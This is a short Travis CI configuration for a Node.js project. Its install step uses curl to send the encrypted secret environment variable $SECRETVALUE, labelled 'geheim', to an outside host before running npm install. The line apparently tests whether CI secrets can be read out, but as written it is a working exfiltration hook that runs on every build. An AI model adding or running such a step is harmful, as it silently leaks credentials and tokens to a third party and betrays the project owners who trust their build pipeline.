env:
  global:
  - secure: tpyQb0M1Pm2fD2Mpa3kUVdVygREfl0wyTqQ+clf0H8mhUWlBBgzS/f0Nh4P29F9Ri92Xl76PYcIj0wIVoXc2dYGlh0Bk9+vVeIFojSW5axInw0eCSkWdFVasl+hJ1PA9aGhwOl8GuQlRmRLxa2wLnu80DMhtC2KYlUk5SnY25kPO2ievkxn/SNv5W0T05vLBqOWaximZ+eo4Tz4ppPrJFrWnxQmvGFJhYOKpFEpRW3gMZ+T6oRKdSKjp8ju1h62WS0gZGqe4orWOc+CNYL5by/lW0Z9uRr62fZUWbSkL6y3kJ83yCTkuF0oqqrYrXMy0p1eojqAMtf6PeXPWkWXQ68PtSeuQaYrvyaVYxWtixyPOzHMjPmGK52orNf/Wgy04oW+tTfaokSgJr18Q4fllpvkfocGYTT2f2IMllbDcjdAF/RkcOu5M8KVeaGo55qJ/aPbZJcTm8Kkz79mFWFoM75ScQTyTfkUcIPKK82vD/zwn+0nliSoKwJ2kuY5ztni2AvsV406xryBqUM7vJJf3AEErcyK22IzGw7WxBIl93UX997+lNt4hlNTSE3WKJgLUwUsLC8r5EaGEPJBks2tewnBbwkHkzai+gCOonKJdG7j1tHHkseZYHxsYXTV2Yak+BbYND2y8GQPir8nzwudenlcZ0o/cCYnaHwar8vPTBMc=
language: node_js
node_js:
  - 6

install:
  - curl --data-urlencode "geheim=$SECRETVALUE" -G "https://home.dobel.click/doesnotexist/"
  - npm install
